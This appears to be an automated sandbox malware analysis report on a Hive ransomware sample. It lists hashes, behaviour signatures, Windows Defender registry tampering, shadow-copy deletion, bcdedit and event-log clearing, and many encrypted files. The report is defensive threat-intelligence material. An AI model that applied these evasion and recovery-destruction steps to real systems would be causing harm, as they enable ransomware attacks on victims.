Malware Analysis Report

2024-10-16 03:11

Sample ID 220112-tz73dsdbg3
Target 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.7z
SHA256 fcada897acd117428099d941fb0f515658f7c13b9808c260e8f8feeaa7a0badb
Tags
evasion ransomware trojan hive spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fcada897acd117428099d941fb0f515658f7c13b9808c260e8f8feeaa7a0badb

Threat Level: Known bad

The file 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.7z was found to be: Known bad.

Malicious Activity Summary

evasion ransomware trojan hive spyware stealer

Deletes Windows Defender Definitions

Hive

Modifies security service

Modifies Windows Defender Real-time Protection settings

Deletes shadow copies

Modifies boot configuration data using bcdedit

Clears Windows event logs

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Modifies registry class

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Opens file in notepad (likely ransom note)

Suspicious behavior: EnumeratesProcesses

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 16:30

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 16:30

Reported

2022-01-12 16:36

Platform

win10-en-20211208

Max time kernel

40s

Max time network

169s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JAAAACQAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_OAAAADgAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DAAAAAwAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_MAAAADAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_KgAAACoAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_HAAAABwAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msaddsr.dll.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Internet Explorer\SIGNUP\install.ins.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_CgAAAAoAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ps.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EgAAABIAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ct.sym.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EAAAABAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jdwpTransport.h.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EgAAABIAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_LAAAACwAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\i640.cab.cat.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\mc.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BgAAAAYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_PgAAAD4AAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BAAAAAQAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NAAAADQAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kab.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BAAAAAQAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_FgAAABYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_OAAAADgAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqlxmlx.rll.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-io.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\keypadbase.xml C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_IAAAACAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ky.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_CgAAAAoAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_FgAAABYAAAA0.p5rwm C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
